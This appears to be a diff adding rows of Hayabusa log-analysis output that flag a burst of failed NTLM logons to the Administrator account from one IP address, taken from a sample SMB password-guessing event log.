+2016-09-20 01:52:16.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: h6KjEOAdknvIMwOA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UHUu0OKm8fsHTnum  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: esdoSyg6HkaSiJ0z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: M4lnVe7qNVEspxFV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Phei86bKte1UCbMi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ehA1LQ2Rs0Wts9JW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.318 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WcXtnkpww8HlSBb3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: y8U7FrQZgDvQ09Uq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.430 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UgWwCtz3Gnoq9zYd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mRNPwCogYrwSGeZf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6O9rWY8UGCbuhSwZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HuH4avUJ4AwqXTGa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: japOFEaHgyT3T2fO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IXpRMMNJRgjmd4km  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gtTXA6BiiVyv42cj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wfYkwvNOfKj7rlTj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QzAZyceDjfmUOdz6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: C0Qais0cF8avXJQ6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7KBM2fIEK6pEl7F2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: N3stckaysFk58QAF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.017 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oVK4S15DDLWISQ7i  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.070 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fAA1bFLD5YMohS9q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: k5V3sfIsj4kYtaGe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IJw4MBG0cvIz2fMR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AXJ0UBfKCzLXJ5y0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Z3A2mmYGcjHBbX3M  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oGlR6pBLnDrzMsqu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Gv7nWzZ1HN9mgTya  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dnPUb3w2d7Ltif2E  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GCWXdvBeDPpeKhWJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GN3OXSzQqLDF348i  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AAWiBhYPNQ0RUuOX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.662 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V5CBG3hblqr8kvWw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MDBaKpfYttm4H1gj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PNszt6piEznMlTdF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iqmBPOQIG6M1rZjX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BJs7tuZpsPMYJHOD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LUT5oe2DwS5vW84K  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3OTe0uiDHhf5GzRL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 71TuxFRZFyZEQp1S  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xRvTmizOLj3UUpD7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LnQEZPWaN2OkpTLa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HnHR9DAtgzu561sx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DfBl3dbluZ7GiFum  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1Hlgn7gsZwRvlXAk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eyHVPtGpnmmRjJuO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: F0l3QC0rLt9yGaIe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XfEng3JgXLmgI8GN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.334 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ORIegzlkHy8AX6RW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AzS4xRnHKxSwz5sZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.415 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v0hA1XvRIlqwKG6g  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mKXKkvlHvjRh33Vw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JIMTGRC5IQlkrG9c  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.658 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NYcLsxwbg8LkGCuQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kmttijRBtXqEbU0W  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.765 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DXC3hYI1Gin59gvG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hQiozAIr9Jgklmks  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: O598IvZRpbdU1liO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xlmYWrAnn3sUNSRk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0aAAkO0uOGIq8zVM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 26K4BIpgUbBNWbDM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: moW3Ts7edqoQ9XeU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: l8C4d3xE0QkWywbf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.086 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: K1EgYFhtgrcjtcXM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7avpgQeA0KCIme9Z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YFgmt3OEw4cDfPhG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.214 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OqITdE5K63nJg9tg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zBs4fYCiprxgDd43  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VtBD0Q2szeURxMYA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.502 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KPUi2NhPP92Rs3hy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2PrbMf9E0fOuwIB8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.613 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 807zsxQ9WETO9YIp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
